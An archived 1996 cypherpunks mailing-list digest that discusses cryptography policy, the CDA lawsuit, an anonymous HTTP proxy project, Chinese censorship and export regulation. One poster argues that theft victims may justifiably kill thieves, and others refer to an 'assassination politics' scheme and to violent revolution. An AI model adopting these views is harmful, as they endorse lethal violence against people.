Further, until about the 1960's, rape was a crime which was often punishable 
by death in the US.

Are you as ignorant as you sound, or have you forgotten that YOUR version of 
reality isn't the only one that has ever existed?


> How much must
>they steal before you are ethicaly justified in killing them? A $1,000
>dollar stereo? Perhaps a $.20 pencil off your desk?

Shouldn't the crime victim decide?  After all, it's HIS property, right?   
What makes you think YOU have the right to decide what crimes he should have 
to tolerate, huh?


>Does this not justify
>your employer killing you for using their machines for your own use,it is
>theft of services after all (and you are on their property).

If employers were to start doing this, they would have a VERY difficult time 
finding new employees to replace their former ones.

> If you have
>sufficient force detain them. The legal system will take them from there

Like most statists, you ascribe way too much legitimacy to "the legal system."


>(assuming of course we revamp it with the other laws we discuss so heatedly
>on here). What I propose is a simple and humane system.

So do I.  But we clearly differ.  Hmmmm.    How can this be?

> If a person commits
>a crime which leads to the death or injury another they spend the remainder
>of their life in a solitary cell with no chance of parole. In other cases
>what should occur is they must work a regular job and provide restitution
>for an extended period (ie $100/mo. to you for 30 years). Should they fail
>to abide by this or they commit another crime then off they go for 20 years
>or so, again with no chance of parole. I also strongly object to plea
>bargaining. The whole concept of sending somebody to jail for 2-3 years is
>silly and counter-productive. It leads to nothing but professional criminals,
>in effect state run training grounds for the criminaly inclined. While in
>jail they should be forced to live in work camps and not prisons as we
>currently know them (unless they fall into the above 'harm another'
>category). What should occur is that they are forced to live a relatively
>normal lifestyle. In short, they work 8 hours a day and must pay for their
>housing, food, etc. from their earning. What needs to occur is to train
>persons to make a living and gain some success at managing a day to day
>lifestyle. Our currrent system treats criminals as animals, which does
>nothing to prevent further violence on their part, it only increases any
>sense of isolation they may have.

The only reason I didn't delete the previous paragraph is that it makes 
absolutely clear that you believe in YOUR way of doing things, and that 
there cannot be any other way.  Sorry, I disagree.

>> Are you a statist?
>> 
>No, as I have said on many occassions, I am a strict Constitutionalist.

That's part of your problem.  It is probably more accurate to say that you 
are a "strict Establishmentarian."  You hide behind the Constitution as if 
it is some sort of "Gift From God."  It isn't.  

As the recent joke goes, "The Constitution may be bad government, but it's 
better than what we have now."

Because it's true.  The current government doesn't follow the Constitution.  
 Some of the people who call themselves "strict Constitutionalists" simply 
want to force a slightly modified version of tyranny on us all.

Jim Bell








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 11 Feb 1996 17:36:57 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Choices
Message-ID: <m0tlWk1-000919C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 PM 2/10/96 -0500, A. Padgett Peterson P.E. Information Security wrote:

>Gov does have the right (in fact the duty) to regulate communications 
>between citizens and non-citizens/sites in other lands (and if you do not 
>think communications with sites such as anon.penet.fi are inside the charter 
>of the NSA, I have this prime Florida land - we're in the dry season now 8*).

Needless to say, I disagree.  Government does not possess ANY "rights."
Merely powers.  Secondly, the Constitution says NOTHING about the authority
of the Federal government to "regulate" (or, for that matter, even merely
MONITOR) communications cross-border.  Sounds to me like you're arguing the
statist line.

Jim Bell

Klaatu Burada Nikto.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 11 Feb 1996 15:55:46 +0800
To: Ray Cromwell <rjc@clark.net>
Subject: Re: The Decense Project
In-Reply-To: <199602110410.XAA20161@clark.net>
Message-ID: <Pine.LNX.3.91.960210235648.11133A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> The first piece of the Decense software is designed to provide "penet" like
> double-blind anonymous transactions for the http protocol. It is written
> as a cgi-bin script which provides a seamless mapping between anonymous
> ids and remote web servers. Servers running Decense can be chained like
> anonymous remailers to increase site level security.

How is it possible to have an anonymous <-> anonymous transaction. The
only way I see this can be done is to have the http data (c2.jpg for
example) actually pass through your cgi-bin script so that the original
identity (location) of the image is not revealed. This may be ok for some
text files and documents, but who would set up this program on their
server knowing that all their bandwidth is going to be gobbled up? 

Perhaps if the files were spread out across many servers (fragmented) in
some way none of the individual pieces could be linked to any other, but
as a whole the file could be accessed.

If you decide to go ahead with the chaining method that you described
above, maybe it would be best to have the cgi-bin program mail the file to
your E-Mail account. If there is going to be any delay at all, you might
as well make it go through some more anonymous servers (more secure) and
have it show up a little bit later in your mailbox. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 12 Feb 1996 00:11:12 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: Strange Sounds of Silence
In-Reply-To: <Pine.SOL.3.91.960210161935.6505A-100000@chivalry>
Message-ID: <199602110510.AAA13679@homeport.org>
MIME-Version: 1.0
Content-Type: text


Simon Spero wrote:

| Are you sure? The coverage has been wall to wall out here (Bay area); 
| front page above the fold, business pages, computer columns, editorials 
| and editorial cartoons. Apparently it's the same level of coverage back 
| in the RTP.

Almost nothing in Boston.  Today's Globe headlines:

Corruption probe shakes up Boston detective unit (Police stealing from
drug dealers.)
Forbes rails against rivals, religious right ("Cites anonymous
callers")
MWRA asks water rate increase.
Math curriculum teaches about gambling
Blast rocks london
'Sticking their necks out'-the fashion statements of neckties.

Theres nothing in the first section of the paper.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 12 Feb 1996 00:11:51 +0800
To: cypherpunks@toad.com
Subject: POINTERS:  02 08 96 Edupage
Message-ID: <Pine.BSD.3.91.960211002903.10070G@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain



 
  Friend, 
 
 
  02 08 96 Edupage includes-- 
 
    COPYRIGHT IN THE DIGITAL AGE (European Film Companies Alliance: 
      "It's mine!")

    INTERNET USAGE POLICIES (Employees' rights: NOT!)


  Cordially, 
 
  Jim 
 
 
 
  NOTE.  Archives: http://www.educom.edu 

         Edupage dated 02 08 96 is archived under date 02 09 96. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 11 Feb 1996 16:08:54 +0800
To: master@internexus.net (Laszlo Vecsey)
Subject: Re: The Decense Project
In-Reply-To: <Pine.LNX.3.91.960210235648.11133A-100000@micro.internexus.net>
Message-ID: <199602110548.AAA19738@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> > The first piece of the Decense software is designed to provide "penet" like
> > double-blind anonymous transactions for the http protocol. It is written
> > as a cgi-bin script which provides a seamless mapping between anonymous
> > ids and remote web servers. Servers running Decense can be chained like
> > anonymous remailers to increase site level security.
> 
> How is it possible to have an anonymous <-> anonymous transaction. The
> only way I see this can be done is to have the http data (c2.jpg for
> example) actually pass through your cgi-bin script so that the original
> identity (location) of the image is not revealed. This may be ok for some
> text files and documents, but who would set up this program on their
> server knowing that all their bandwidth is going to be gobbled up? 

   The same people who are running the anonymous http proxies. If you've
got a T1, it's not much of a problem. And for some people, privacy is
a selling point, like Sameer's c2 system.  Also, let's say NOW
wants to put up a site with abortion information. They could pay a set of
anonymous proxy servers for the "service" of providing a anonymous mapping
service for them. And of course, all the various CyberPorn companies,
many of whom may have their business illegalized, will want to pay for 
such a service. Especially, if the proxies are offshore.

   I'm not really concerned about who will want to provide the service.
I think there are many individuals who would. I'm concerned about making
the software available. Inline images could always be turned off in the
script if need be.

-Ray











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Sun, 11 Feb 1996 08:58:58 +0800
To: cypherpunks@toad.com
Subject: http://www.eubank.ag
Message-ID: <199602110010.BAA04271@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 11 Feb 1996 19:14:59 +0800
To: amehta@doe.ernet.in (Arun Mehta)
Subject: Re: China
In-Reply-To: <Pine.3.89.9602101826.D2343-0100000@mahavir>
Message-ID: <199602101429.BAA22868@suburbia.net>
MIME-Version: 1.0
Content-Type: text


[...]
> bottle. Remember that starting this year, satellites of Iridium and other 
> LEO satellite projects will start to go up, spreading bandwidth around 
> the world. How will the Chinese government build a firewall against 
> satellites? Say, for instance orbiting anonymous remailers with pgp? Will 
> happen some day.

Radio *reception* of non goverment approved frequences is illegal in a
number of countries, China included. Possesion of the equipment needed
to received these frequencies is also illegal in a number of countries
(including Australia). Sale of that equipment is illegal in still more
countries, including the USA.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 12 Feb 1996 04:05:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
In-Reply-To: <960210230549.20217184@hobbes.orl.mmc.com>
Message-ID: <199602110702.CAA05558@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Padgett writes:
> Gov does have the right (in fact the duty) to regulate communications 
> between citizens and non-citizens/sites in other lands

(not wishing to start a flamewar) Why do you think so ?

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 12 Feb 1996 04:06:06 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <2.2.32.19960209112844.0068f1a8@arn.net>
Message-ID: <Pine.BSF.3.91.960211020941.4468A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Feb 1996, David K. Merriman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 08:27 AM 02/9/96 -0800, Simon Spero <ses@tipper.oit.unc.edu> wrote:
> > The Administration has repeatedly stated its belief that those parts of 
> >the bill are unconsitutional, and does not intend to enforce them. 
> 
> So why the fornicate did they include them? What's the point of passing laws that they say they're not going to enforce, unless it's either to enforce them later, or soften up the public for something _slightly_ more tolerable later.

The Administration did not include those provisions.  Ignorant Members of 
Congress did.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 11 Feb 1996 16:48:11 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <m0tlT1P-0008zzC@pacifier.com>
Message-ID: <199602110817.CAA01909@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> If Perry is REALLY sincere about objecting to the NON-crypto part of AsPol,
> he should demonstrate this by writing notes which are focussing on the
> crypto aspects, rather than just complaining.

What's the proper procedure for complaining about the assasination part 
of "AsPol"?

In general, it doesn't bother me when the list goes "off topic" -- I don't
read the stuff that doesn't interest me.  But when you start talking about
violence, you have to expect that people are going to react negatively. 
We have to say, "that's nuts" -- otherwise people will think that we're
unbalanced sociopaths. 

How much weight is Lotus going to give the opinions of a bunch of
unbalanced sociopaths when they're thinking about making deal to gak those
extra 24 bits?  Not much, I'll bet.  And what would happen if a murderous
thug held a press conference after cracking an exportable key?  Those
myopic journalists, rotten sons of bitches that they are, probably
wouldn't talk about the crypto at all.  "Why aren't you in jail?" --
that's the sort of thing you'd have to expect.  You could complain, but it
wouldn't do any good. 

"Listen.  I'm a working cryptographer, and I have a family to support.  In
order to take care of my kids, I have to get a job, and in order to get a
job I have to make my reputation.  How can I make my reputation if I can't
publicize my demonstration?  Everyone else is getting rich -- David
Sternlight and Dorothy Denning both have new condos, and Freeh just got
back from a luxury vacation at Disney World.  I don't want to get rich, I
just want to make a living.  So can we forget about the people I
assasinated and talk about the problems with these 40 bit keys?"

Deaf ears, that's what your words would fall on.  It would be like OJ and
his video all over again. 

I apologize in advance for not getting the joke if "AsPol", like Blacknet,
is tongue in cheek.  I haven't been following the topic closely.

I hope you're not serious.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Feb 1996 17:55:42 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
Message-ID: <ad42ecfe46021004d742@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:02 AM 2/11/96, lmccarth@cs.umass.edu wrote:
>Padgett writes:
>> Gov does have the right (in fact the duty) to regulate communications
>> between citizens and non-citizens/sites in other lands
>
>(not wishing to start a flamewar) Why do you think so ?

It isn't so. There are no restrictions, regulations, rules, or guidelines
about communicating with non-citizens/sites. None. No permits are needed,
no forms have to be filled out, no government offices have to be visited to
explain one's reasons for communicating with a non-citizen.

Just pick up the phone, or type a message in your computer, or whatever. We
citizens of the U.S. do it many times a day.

(There are two special cases, which hardly make Padgett's point: "Trading
with the Enemy Act" sorts of restrictions which limit commercial contacts
with Cuba, North Korea, and a few other countries. And the espionage laws.
That is, give nuclear weapons info to North Korean and you're in big
trouble. And there are various other kinds of minor rules, such as that no
citizen may engage in private diplomacy, bypassing the normal channels. I
don't believe these special cases are what Padgett could have meant when he
described the regulatory powers of government.]

--Tim May, who is even now communicating with foreigners without regulation

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 11 Feb 1996 19:12:56 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: American Reporter on CDA 2/8/96 (fwd)
Message-ID: <199602111021.CAA21474@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:28 AM 2/10/96 +0000, Sean Gabb. wrote:
>What a splendid article!  I will keep it on disk forever.

Congratulations!  You're now an Unindicted Co-Conspirator!

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 11 Feb 1996 19:12:55 +0800
To: Arun Mehta <amehta@doe.ernet.in>
Subject: Re: China
Message-ID: <199602111021.CAA21477@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:18 PM 2/10/96 +0530, you wrote:
> Remember that starting this year, satellites of Iridium and other 
>LEO satellite projects will start to go up, spreading bandwidth around 
>the world. How will the Chinese government build a firewall against 
>satellites? Say, for instance orbiting anonymous remailers with pgp? Will 
>happen some day.

Remember that much of censorship, as with cryptography, is economics.
With Iridium satellite time at $3/minute, charged to the recipient,
it's well within the financial means of a Banned Pharmaceutical Wholesaler,
and well outside the financial means of an average Chinese university student,
partly because the Chinese economy has much lower price and wage structures
than the major Western economies do.

On the other hand, renting a few gigabytes per day of satellite broadcast time
to broadcast isn't out of the question, or at least renting a few tens of
megabytes per day wasn't out of the question a couple years ago :-)

On the other hand, as you say, if the Chinese government tries a Tien-an-men
in cyberspace, the students _will_ have better tanks.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 11 Feb 1996 19:13:13 +0800
To: cypherpunks@toad.com
Subject: Re: Privacy Without Tears
Message-ID: <199602111021.CAA21485@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>If everyone not only has a link to these pages in text, but also has their
>>"PGP secured!", or similar little graphic on their pages, linked to these
>>sites as well, it would save a lot of people a lot of redundant explaining
>>and it would help spread the word about PGP like wildfire to the masses.
>
>I like that a lot! A nifty graphic would be the old-fashioned engraving of a
>padlock on the O'Reilly book about PGP.

ViaCrypt's PGP version for Windows has a more modern-looking padlock;
the icon I use for the Program Manager group I keep PGP, Private Idaho, etc. in
is the Safe icon that's one of Program Manager's builtins.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 11 Feb 1996 18:15:47 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: A Rant about Senator James Exon
In-Reply-To: <8l7GaN600bk=8YzEFQ@andrew.cmu.edu>
Message-ID: <Pine.3.89.9602110344.A20382-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 10 Feb 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 9-Feb-96 A Rant about Senator James
> .. by Timothy C. May@got.net 
> > >What do you think? Is this worth it?
> >  
> > Here's something I did about Senator James Exon:
> 
> In my protest against the Hon. Jim Exon, I went to his office this week
> and dropped off a printout of indecent speech that I have on the Justice
> on Campus Project:
> 
>    http://joc.mit.edu/lawsuit/examples.html
> 
> I told the bewildered receptionist that his boss was to blame for making
> me a criminal.
> 
> I'm now a plaintiff in the ACLU/EFF lawsuit challenging the CDA, BTW.
> Two articles on our lawsuit are at:
> 
>    http://fight-censorship.dementia.org/fight-censorship/dl?num=1063
>    http://fight-censorship.dementia.org/fight-censorship/dl?num=1067

How does one join the lawsuit?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 11 Feb 1996 18:25:14 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Choices
In-Reply-To: <m0tlWk1-000919C@pacifier.com>
Message-ID: <Pine.3.89.9602110309.B20382-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 11 Feb 1996, jim bell wrote:

> Needless to say, I disagree.  Government does not possess ANY "rights."
> Merely powers.  Secondly, the Constitution says NOTHING about the authority
> of the Federal government to "regulate" (or, for that matter, even merely
> MONITOR) communications cross-border.  Sounds to me like you're arguing the
> statist line.

The government has, for quite some time, attempted to control most things 
in our lives (and quite successfully) by evoking the "interstate commerce 
clause" incantation.  Only recently has the Supreme Court put its 
collective foot down (in the recently-decided "no guns within 1000 feet 
of a school" law, which the government LOST).  Let's hope it does it more 
often :)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 11 Feb 1996 15:45:35 +0800
To: cypherpunks@toad.com
Subject: Building in Big Brother
Message-ID: <199602110459.FAA28262@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   Building in Big Brother:
   The Cryptographic Policy Debate
   Edited by Lance J. Hoffman
   Springer Verlag Publishers
   Copyright: March 1995
   Price:$29.95
   ISBN 0-387-94441-9
     
_________________________________________________________________


   
   "If you ever wondered how a particular computer technology 
could attract the interest of the directors of three 
intelligence agencies, the heavyweights in the computer 
industry, a gang of programmers turned freedom fighters, and 
the President of the United States, you need look no farther 
than Building in Big Brother. This book outlines the next civil 
liberties battle in the United States."

   - Marc Rotenberg, Electronic Privacy Information Center

   
   "One-stop-shopping for even the most sophisticated analyst 
of the policy wars over cryptography."

   - A. Michael Froomkin, Associate Professor of Law, 
University of Miami Law School

   
   "Lance Hoffman has compiled an extraordinarily useful and 
well balanced collection of materials on cryptography and its 
applications. This book will instantly become a definitive 
compendium."

   - Peter G. Neumann

   
   "Though Lance Hoffman is a dedicated opponent of current 
government policy, he has assembled a volume that should be -- 
and will be -- on the desk of every cryptographic policymaker 
in Washington. He has accurately recorded the many voices in a 
debate that will profoundly affect our future, for good or ill, 

well into the twenty-first century. This book is an important 
contribution to the history of encryption. It is an even more 
important contribution to those who are struggling to shape 
that history."

   - Stewart Baker, Steptoe & Johnson (formerly General Counsel 
to the National Security Agency)


   "An authoritative source of political writings by the major 
players in the crypto revolution."

   - Philip Zimmermann, Creator of PGP

_________________________________________________________________



   Includes Steven Levy's peerless "Cypherpunks vs Uncle Sam" 
and other Shortstop-proof cpunx ammunitions.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 12 Feb 1996 05:42:57 +0800
To: cypherpunks@toad.com
Subject: Decense v0.10 alpha available
Message-ID: <199602111126.GAA07364@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I've made Decense v0.10 alpha available publically. There's a few
non-critical things to be fixed and plenty of features to be added.
I have other obligations at the moment, so I can't spare anymore time
right now to polish it up. If you're a perl hacker, take a look at it.


The Decense Project homepage is http://www.clark.net/pub/rjc/decense.html
You can retrieve the tarfile there.

Have fun, and Write Code!
-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 11 Feb 1996 16:16:45 +0800
To: lunaslide@loop.com
Subject: "feudal" states and national destiny
In-Reply-To: <v01530512ad3f836dd72d@[204.179.169.87]>
Message-ID: <Pine.BSD.3.91.960208130731.15598A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	I don't wish to get this one going on c-punks, but you will see
    shortly just how quickly the "feudal" national powers are going to 
    be able to erect national firewalls. 

	We are entirely dependent on AT&T, Sprint, MCI, British Telcom,
    and so on for nation to nation or region to region communications
    --and they in turn are entriely dependent on the various national
    governments for the _franchise_ to "enter" or operate within the 
    country. 

	telephone lines are a trickle of information --the old uucp
    when I complained when the daily _total_ traffic exceed 2 megabyte
    and the heydey of TrailBlazers.  today it's 154 Mb/sec trunks, and
    they are bogging down. the governments regulate these lines and 
    outside the U.S. most governments own these lines.

	satellites are another perfect example; the governments control
    the franchises for the up and down links and the allocation of 
    frequencies. and, who controls the satellite launches? Even the 
    European consortium is controlled --forget the Chinese and the 
    Russians!

	Is the government doing something illegal vis a vis 
    communications policy (other than the obliteration of free speech with
    CDA)?  No, but it is obvious they will, since the CDA or whatever is
    their intent and they have the power to enforce their intent --if
    nothing else by invoking FEMA, which a cornered Clinton might do. 

	the extremists are almost always ignored. we are certainly viewed 
    as extremists. nobody took the Libertarian party seriously until
    Howard Stern ran for governor of NY --and that was the circus of Will
    Rogers, not a political platform. Years of cooperative political 
    graft (the interest in the status quo) has made the two party system
    the only __succeedable__ political system in the U.S.

	eventually, only violent revolution of the masses succeeds --men
    of rational thoughts and wise counsel are easily suppressed, if not
    eliminated.

        As for the dreamers who believe the government is or will NOT
    do (be doing) something illegal, the line forms to the right for 
    reeducation.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 11 Feb 1996 20:28:05 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: A Rant about Senator James Exon
In-Reply-To: <Pine.3.89.9602110344.A20382-0100000@dal1820.computek.net>
Message-ID: <gl7Rh9y00bk=8c4lFz@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 11-Feb-96 Re: A Rant about Senator Ja.. by Ed
Carp@dal1820.computek 
> > I'm now a plaintiff in the ACLU/EFF lawsuit challenging the CDA, BTW.
> > Two articles on our lawsuit are at:
> > 
> >    http://fight-censorship.dementia.org/fight-censorship/dl?num=1063
> >    http://fight-censorship.dementia.org/fight-censorship/dl?num=1067
>  
> How does one join the lawsuit?

I believe that ACLU/EFF/EPIC have found the necessary plaintiffs for the
court challenge, but they still may be interested in others. Send me
mail and I'll pass it along. (The original call for plaintiffs went out
last fall, and the lawsuit was filed last week.)

But generally, to be a plaintiff you have to have standing to sue. You
have to be specificially hurt or negatively affected by the law. The
plaintiffs include folks who run web sites, mailing lists, and offer
other public online resources that may happen to include indecent or
patently offensive speech.

Say, the hearing when we find out if we get an injunction preventing
enforcement of the CDA is going to be this Wednesday in Philadelphia.
Anyone else want to go?

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sun, 11 Feb 1996 23:34:57 +0800
To: cypherpunks@toad.com
Subject: URLs for Anon remailers?
Message-ID: <v0153050dad43b510ec30@[204.179.169.65]>
MIME-Version: 1.0
Content-Type: text/plain


Anybody got some good URLs for info on anonymous remailers for novices and
experienced users alike?  I need to know which are which so I can hand them
out like candy to my .edu friends who aren't _as_ net savvy, but aren't
dumb as dirt clods either.  Much appreciated.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 11 Feb 1996 23:52:18 +0800
To: cypherpunks@toad.com
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
In-Reply-To: <ad42ecfe46021004d742@[205.199.118.202]>
Message-ID: <41X5iD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> >> Gov does have the right (in fact the duty) to regulate communications
> >> between citizens and non-citizens/sites in other lands
> >
> >(not wishing to start a flamewar) Why do you think so ?
>
> It isn't so. There are no restrictions, regulations, rules, or guidelines
> about communicating with non-citizens/sites. None. No permits are needed,
> no forms have to be filled out, no government offices have to be visited to
> explain one's reasons for communicating with a non-citizen.
>
> Just pick up the phone, or type a message in your computer, or whatever. We
> citizens of the U.S. do it many times a day.
>...
[trading w/ the enemy act & espionage]

I strongly disagree.

Defense Trade Regulations, Section 120.10 - Export -- permanent and temporary.

 Export means:

 (4) Disclosing or transferring technical data to a foreign person, whether
 in the United States or abroad;

A foreign person is defined in S 120.11, and means anyone who's not a U.S.
citizen. Technical data is defined in S 120.33

 (d) Information, other than *software* as defined in 120.23(c), which is
 required for the design, development, ... maintenance or modification of
 defense articles. This includes, for example, information in the form of
 blueprints, drawings, photographs, plans, instructions and documentation.
 This also includes information that advances the state of the art of articles
 on the U.S. Munitions List. This definition does not include information
 concerning general scientific, mathematical or engineering principles
 commonly taught in schools, colleges and universities. It also does not
 include basic marketing information on function or purpose or general
 system description of desense articles.

And we all know that Part 121 - The United States Munitions List - has
Category XIII -- Auxiliary Military Equipment

 (b) Speech scramblers, privacy devices, cryptographic devices and software
 (encoding and decoding), and components specifically designed to be modofied
 therefore, ancillary equipment, and protective apparatus specifically
 designed or modofied for such devices, components, and equipment.

As I read it, a college professor might get busted for explaining his own new
